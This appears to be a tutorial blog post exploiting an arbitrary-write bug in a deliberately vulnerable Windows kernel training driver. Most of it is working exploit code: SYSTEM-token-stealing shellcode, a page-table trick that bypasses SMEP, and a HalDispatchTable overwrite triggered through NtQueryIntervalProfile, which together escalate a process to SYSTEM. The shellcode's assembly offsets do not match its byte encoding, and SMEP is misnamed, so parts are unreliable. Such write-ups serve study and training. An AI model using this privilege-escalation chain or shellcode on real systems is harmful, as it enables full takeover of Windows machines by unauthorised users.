12 minute read

Exploiting Arbitrary Write

Intro

Recently I have taken an interest in Windows kernel exploitation and I came across this github repo. This repo covers many different kind of exploitation technics in the Windows kernel. This write up and the following to come is on solving some of the challengs in this project. A big thanks for the creators of this project.

As the headline states, this write up will be about exploiting an Arbitrary Write.

Communicating with the driver

To start with, we need to find the symbolic link in order to talk to the device object of the driver. Looking at winobj from Sysinternals, we can see the following record-

Next we will take a look at IDA in otrder to find the IOCTL code we need in order to trigger the arbitrary write handler.

The value of the IOCTL is 0x0022200B.

Code Overview

Let’s start by looking at ArbitraryWrite.c, we have a function called - TriggerArbitraryWrite that takes one argument,

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
)

if we take a look at ArbitraryWrite.h header file, we can see the following struct -

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

It consist out of two pointers, What and Where. The What pointer will store the address of the data that we want to write, and the Where pointer will point to the address in memory where we want to write our data into.

The rest of the function looks like this-

We can see a call to ProbeForRead which verifies that the UserWriteWhatWhere buffer actually resides in the user portion of the address space, and is correctly aligned. Then, we see *v2 = *v1 which Basically does the action of copying the data.

Analysing The Vulnerability

After we overviewed the code let’s understand where and why this code is vulnerable. As the comment inside the code states:

This is a vanilla Arbitrary Memory Overwrite vulnerability because the developer is writing the value pointed by ‘What’ to memory location pointed by ‘Where’ without properly validating if the values pointed by ‘Where’ and ‘What’ resides in User mode.

Exploiting The Vulnerability

So, we have reviewed the code, understood the vulnerability, and it’s time to write our exploit. We are going to write the exploit for Windows 10 x64 RS1, the reason I chose this version is the fact that each new RS Microsoft added more mitigations that made it hard for us to develop kernel exploits. Starting from RS2 Microsoft introduced kCFG which stands for “Kernel Control Flow Guard”, this mitigation validate all the call instructions and makes sure the memory location in which the function residence is legitimate. We wont get into how to bypass kCFG here, but I will say it’s possible, and hopefully on the next write up we will be facing a higher RS version.

In this write up we are going to deal with the following mitigations -

  • kASLR (Kernel Address Space Layout Randomization).
  • Page Table Randomization.
  • NX (No Execute).
  • SMEP (Supervisor Mode Access Prevention).

The steps we are going to do is as follows:

  1. Write a shellcode that will steal the system access token and set it to our process.
  2. Allocate rwx memory region in user mode for our shellcode.
  3. Changing the U/S bit of the PTE in which our shellcode was allocated.
  4. Modify one of the pointers inside HalDispatchTable to point to our user mode shell code.
  5. Call a syscall to trigger the use of HalDispatchTable which will then execute our shellcode as kernel.

Don’t worry if you don’t understand any of the steps, they will be explained later on.

Shellcode

I am going to use a common generic shellcode that will copy the system access token to our process.

[BITS 64]
_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8			; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID
	jnz __loop			; Loop until SYSTEM PID is found
	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process
	xor rax, rax			; STATUS_SUCCESS
	ret				; Done!
char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"
	"\x48\x8B\x80\xB8\x00\x00\x00"
	"\x48\x89\xC3\x48\x8B\x9B\xF0\x02\x00\x00"
	"\x48\x81\xEB\xF0\x02\x00\x00"
	"\x48\x8B\x8B\xE8\x02\x00\x00"
	"\x48\x83\xF9\x04\x75\xE5"
	"\x48\x8B\x8B\x58\x03\x00\x00"
	"\x80\xE1\xF0\x48\x89\x88\x58\x03\x00\x00"
	"\x48\x31\xC0\xC3";

Allocating rwx memory in user mode

Here we allocate a rwx memory region for our shellcode.

void* shellcode = VirtualAlloc(
	NULL, // Address.
	sizeof(payload), // Size.
	0x3000, // Allocation Type.
	0x40 // Protection.
);

// Moving memory into allocated space in user mode.

RtlMoveMemory(
	shellcode,
	payload,
	sizeof(payload)
);

Changing U/S bit of the PTE

Remember I said that the kernel is going to execute our code from a memory region in user mode? Well, in order to do so we need to bypass SMEP.

What is SMEP?

SMEP or Supervisor Mode Access Prevention, is a CPU feature that will cause a “Bug Check” to occur with the following error message - ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY, whenever the CPU will try to access a memory region in user mode with CPL=0 while the right CPL(Current Privilege Level) should be CPL=3. We can see if SMEP is enabled by looking at the 20th bit in cr4 -

In this case, it’s the 1 at the start.

As documented in Intel’s manual 3A sections 2.5 (CR4.SMEP flag) and 4.6 (per memory page settings).

So, when SMEP is enabled the CPU will check the U/S flag of the page and if it’s value is equals to 0 the CPU will allow execution of the code with CPL=0, Notice that SMEP is per page. in other words, the kernel will be able to run the code although it resides in user mode.

Alright, after we cleared what SMEP is, it’s time to get our hands dirty and understand how to change the U/S flag of the PTE. I am assuming you know what is a PTE and how paging works, so I wont get into that.

In order to modify the control flag of the PTE we first need to find the address of the PTE in memory. Remember that the base address from which we can start calculating the address is being randomized each time the OS reboots, so we need to find a way to dynamically know what is the base address.

nt!MiGetPteAddress

Quoting from “Connor McGarr” blog (Link bellow) -

Windows has an API called nt!MiGetPteAddress that performs a specific formula to retrieve the associated PTE of a memory page.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits.
  2. Moves the value of 0x7FFFFFFFF8 into RAX.
  3. Bitwise AND’s the values of RCX and RAX together.
  4. Moves the value of 0FFFF818000000000 into RAX.
  5. Adds the values of RAX and RCX.
  6. Performs a return out of the function.

0FFFF818000000000 is a 64-bit address which is actually the base of the PTEs.

You probably ask yourself, but how does it helps us? The nice thing about “Write What Where” is that it can be used as an arbitrary read as well ;) We can find the offset of this function in kernel and read the base address which can be found at offset nt!MiGetPteAddress+0x13 and this is how we will be able to dynamically calculate the page address and change the U/S flag.

The offset of nt!MiGetPteAddress in Windows 10 RS1 is at kernel_base_address + 0x51214.

Time to write some code

Let’s do it with code(The following code snippets are highly inspired by Connor’s blog with a little cosmetics changes of mine) -

We will start by getting the address of “ntoskernel” -

unsigned long long getKernelBaseAddress() {

	void* lpImageBase[1024];
	unsigned long lpcbNeeded;

	int baseOfDrivers = EnumDeviceDrivers(
		lpImageBase,
		sizeof(lpImageBase),
		&lpcbNeeded
	);

	if (!baseOfDrivers)
	{
		LOG("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
		exit(1);
	}

	// ntoskrnl.exe is the first module dumped in the array.
	unsigned long long kernelBaseAddress = (unsigned long long)lpImageBase[0];

	LOG("[+] ntoskrnl.exe is located at: 0x%llx\n", kernelBaseAddress);

	return kernelBaseAddress;
}

Then, we will be getting the PTEs base address -

unsigned long long getBasePteAddress(HANDLE hDriver, unsigned long long kernelBaseAddress) {

	unsigned long long NtMiGetPteAddress = kernelBaseAddress + MI_PTE_GET_ADDRESS_OFFSET;

	// Defining a pointer to write the base of PTEs to. (must initialize pointer, hence placeholder).
	unsigned long long pteBaseAddressPlaceHolder = 0;
	PULONGLONG baseOfPtes = &pteBaseAddressPlaceHolder;

	// Defining buffer to send to driver
	char buffer[0x10];
	size_t oneQword = 0x8;

	// Initializing buffer to junk to satisfy type error of memset.
	memset(buffer, 0x41, 0x10);

	// Actual buffer for extracting the PTE base.
	memcpy(buffer, &NtMiGetPteAddress, oneQword);
	memcpy(&buffer[0x8], &baseOfPtes, oneQword);

	sendBufferToDriver(hDriver, buffer);

	LOG("[+] Base of the page table entries: 0x%llx\n", (unsigned long long) * baseOfPtes)

	return (unsigned long long) * baseOfPtes;
}

Now, let’s find the shellcode PTE -

unsigned long long getShellcodePTEAddress(unsigned long long baseOfPtes, void* shellcodeAddress) {

	// Bitwise operations to locate PTE of shellcode page
	unsigned long long shellcodePte = (unsigned long long)shellcodeAddress >> 9;
	shellcodePte = shellcodePte & 0x7FFFFFFFF8;
	return shellcodePte + baseOfPtes;
}

Calculate the address of the Control Flags where the U/S bit can be found -

unsigned long long getShellcodePteControlFlagAddress(HANDLE hDriver, unsigned long long shellcodePte) {

	// Defining a pointer to extract shellcode's PTE control bits. (must initialize pointer, hence placeholder).
	unsigned long long placeholder = 0;
	PULONGLONG pteControlFlagsPointer = &placeholder;

	// Defining buffer to send to driver.
	char buffer[0x10];
	size_t oneQword = 0x8;

	// Initializing buffer to junk to satisfy type error of memset
	memset(buffer, 0x41, 0x10);

	// Actual buffer for extracting PTE control bits
	memcpy(buffer, &shellcodePte, oneQword);
	memcpy(&buffer[0x8], &pteControlFlagsPointer, oneQword);

	sendBufferToDriver(hDriver, buffer);

	LOG("[+] PTE control bits for shellcode page: %p\n", (unsigned long long) * pteControlFlagsPointer);

	return (unsigned long long) * pteControlFlagsPointer;
}

Lastly, let’s change the U/S flag -

void changeUSFlag(HANDLE hDriver, unsigned long long pteControlFlags , unsigned long long shellcodePte) {

	// Corrupting U/S bit in PTE to make user mode page become kernel mode.
	unsigned long long taintedPte;
	taintedPte = pteControlFlags & 0xFFFFFFFFFFFFFFFB;

	// Defining pointer for corrupted PTE bits.
	PULONGLONG taintedptePointer = &taintedPte;

	// Defining buffer to send to driver.
	char buffer[0x10];
	size_t oneQword = 0x8;

	// Initializing buffer to junk to satisfy type error of memset.
	memset(buffer, 0x41, 0x10);

	// Actual buffer for corrupting PTE.
	memcpy(buffer, &taintedptePointer, oneQword);
	memcpy(&buffer[0x8], &shellcodePte, oneQword);

	// Print update for corrupting PTE
	LOG("[+] Corrupting PTE of shellcode to make U/S bit kernel mode...\n");

	sendBufferToDriver(hDriver, buffer);
}

So, at this point we can say “good bye” to SMEP and continue into modifying the pointer inside HalDispatchTable.

Modifying HalDispatchTable

From “Geoff Chappell” -

The HAL_DISPATCH structure is a table of pointers to optional HAL functionality. The kernel keeps the one instance of this table. It’s in the kernel’s read-write data section and its address is exported as HalDispatchTable. The table initially has the kernel’s built-in implementations of most (but not all) functions. Many are trivial. Some are substantial. The HAL overrides some. No known HAL overrides all. Functionality that has no meaning to a particular HAL is left to the kernel’s default (and HAL programmers are spared from writing even dummy code for nothing that matters to them). Moreover, since the address is exported, rather than communicated specifically to the HAL, it seems to have been intended all along that the functionality is exposed to other kernel-mode modules such as drivers not only for them to call but also to override further.

What we are going to do is, overwrite one of the pointers and then make a syscall the will trigger the execution of the function to which the pointer points.

In order to modify the HalDispatchTable we first need to find ntoskernel base address, just as we did last part. After we have the base address we need to know what is the offset of HalDispatchTable, in Windows 10 RS1 the offset is 0x2f43b8.

Now we will replace the pointer at offset HalDispatchTable+0x8. Why? The answer can be found on the disassembly of nt!NtQueryIntervalProfile Syscall -

kd> uf nt!NtQueryIntervalProfile
nt!NtQueryIntervalProfile:
fffff800`96584df0 48895c2408      mov     qword ptr [rsp+8],rbx
fffff800`96584df5 57              push    rdi
fffff800`96584df6 4883ec20        sub     rsp,20h
fffff800`96584dfa 488bda          mov     rbx,rdx
fffff800`96584dfd 65488b042588010000 mov   rax,qword ptr gs:[188h]
fffff800`96584e06 408ab832020000  mov     dil,byte ptr [rax+232h]
fffff800`96584e0d 4084ff          test    dil,dil
fffff800`96584e10 7419            je      nt!NtQueryIntervalProfile+0x3b (fffff800`96584e2b) Branch nt!NtQueryIntervalProfile+0x22:
fffff800`96584e12 48b80000ffffff7f0000 mov rax,7FFFFFFF0000h
fffff800`96584e1c 483bd0          cmp     rdx,rax
fffff800`96584e1f 480f43d0        cmovae  rdx,rax
fffff800`96584e23 8b02            mov     eax,dword ptr [rdx]
fffff800`96584e25 8902            mov     dword ptr [rdx],eax
fffff800`96584e27 eb02            jmp     nt!NtQueryIntervalProfile+0x3b (fffff800`96584e2b) Branch nt!NtQueryIntervalProfile+0x3b:
fffff800`96584e2b e81c000000      call    nt!KeQueryIntervalProfile (fffff800`96584e4c)
fffff800`96584e30 4084ff          test    dil,dil
fffff800`96584e33 7411            je      nt!NtQueryIntervalProfile+0x56 (fffff800`96584e46) Branch nt!NtQueryIntervalProfile+0x45:
fffff800`96584e35 8903            mov     dword ptr [rbx],eax
fffff800`96584e37 eb00            jmp     nt!NtQueryIntervalProfile+0x49 (fffff800`96584e39) Branch nt!NtQueryIntervalProfile+0x49:
fffff800`96584e39 33c0            xor     eax,eax
fffff800`96584e3b 488b5c2430      mov     rbx,qword ptr [rsp+30h]
fffff800`96584e40 4883c420        add     rsp,20h
fffff800`96584e44 5f              pop     rdi
fffff800`96584e45 c3              ret

nt!NtQueryIntervalProfile+0x56:
fffff800`96584e46 8903            mov     dword ptr [rbx],eax
fffff800`96584e48 ebef            jmp     nt!NtQueryIntervalProfile+0x49 (fffff800`96584e39) Branch

Inside that function we can see a call is being made to nt!KeQueryIntervalProfile -

kd> uf nt!KeQueryIntervalProfile
nt!KeQueryIntervalProfile:
fffff800`96584e4c 4883ec48        sub     rsp,48h
fffff800`96584e50 83f901          cmp     ecx,1
fffff800`96584e53 7430            je      nt!KeQueryIntervalProfile+0x39 (fffff800`96584e85) Branch nt!KeQueryIntervalProfile+0x9:
fffff800`96584e55 ba18000000      mov     edx,18h
fffff800`96584e5a 894c2420        mov     dword ptr [rsp+20h],ecx
fffff800`96584e5e 4c8d4c2450      lea     r9,[rsp+50h]
fffff800`96584e63 4c8d442420      lea     r8,[rsp+20h]
fffff800`96584e68 8d4ae9          lea     ecx,[rdx-17h]
fffff800`96584e6b ff15c714deff    call    qword ptr [nt!HalDispatchTable+0x8 (fffff800`96366338)]
fffff800`96584e71 85c0            test    eax,eax
fffff800`96584e73 7818            js      nt!KeQueryIntervalProfile+0x41 (fffff800`96584e8d) Branch nt!KeQueryIntervalProfile+0x29:
fffff800`96584e75 807c242400      cmp     byte ptr [rsp+24h],0
fffff800`96584e7a 7411            je      nt!KeQueryIntervalProfile+0x41 (fffff800`96584e8d) Branch nt!KeQueryIntervalProfile+0x30:
fffff800`96584e7c 8b442428        mov     eax,dword ptr [rsp+28h]

nt!KeQueryIntervalProfile+0x34:
fffff800`96584e80 4883c448        add     rsp,48h
fffff800`96584e84 c3              ret

nt!KeQueryIntervalProfile+0x39:
fffff800`96584e85 8b0595c2dfff    mov     eax,dword ptr [nt!KiProfileAlignmentFixupInterval (fffff800`96381120)]
fffff800`96584e8b ebf3            jmp     nt!KeQueryIntervalProfile+0x34 (fffff800`96584e80) Branch nt!KeQueryIntervalProfile+0x41:
fffff800`96584e8d 33c0            xor     eax,eax
fffff800`96584e8f ebef            jmp     nt!KeQueryIntervalProfile+0x34 (fffff800`96584e80) Branch

Here, we can see a call to HalDispatchTable+0x8. There we will put our pointer.

It’s time to write the final part of the exploit -

void modifyHalDispatchTable(unsigned long long kernelBaseAddress, HANDLE hDriver, void* shellcode) {

	unsigned long long halDispatchTable = kernelBaseAddress + HAL_DISPATCH_TABLE_OFFSET;

	// Defining buffer to send to driver.
	char buffer[0x10];
	size_t oneQword = 0x8;

	// Initializing buffer to junk to satisfy type error of memset.
	memset(buffer, 0x41, 0x10);

	// Actual buffer for overwriting [nt!HalDispatchTable+0x8] with shellcode address.
	memcpy(buffer, &shellcode, oneQword);
	memcpy(&buffer[0x8], &halDispatchTable, oneQword);

	sendBufferToDriver(hDriver, buffer);

	printf("[+] Overwrote [nt!HalDispatchTable+0x8] with shellcode address...\n");
}

In the above, we are modifying the HalDispatchTable with a pointer to our shellcode.

void triggerExploit() {

	// Locating nt!NtQueryIntervalProfile.
	NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
		GetModuleHandle(
			TEXT("ntdll.dll")),
		"NtQueryIntervalProfile"
	);

	// Error handling.
	if (!NtQueryIntervalProfile)
	{
		printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
		exit(1);
	}

	// Print update for found ntdll!NtQueryIntervalProfile.
	printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

	// Invoking nt!NtQueryIntervalProfile to execute [nt!HalDispatchTable+0x8]
	printf("[+] Calling nt!NtQueryIntervalProfile to execute [nt!HalDispatchTable+0x8]...\n");

	// Calling nt!NtQueryIntervalProfile.
	ULONG exploit = 0;

	NtQueryIntervalProfile(
		0x1234,
		&exploit
	);
}

That’s it, our process is now running with a system token!

Wrapping up

In this write up we saw how to exploit an arbitrary “Write What Where” in Windows kernel. As I have said in the above, there are many different mitigations in Windows 10 latest versions and it gets even harder when VBS is in place. Here I have showed how to bypass some of the mitigations like SMEP and Page Table Randomization. There are more ways to bypass those mitigations other than what I have showed.

Sources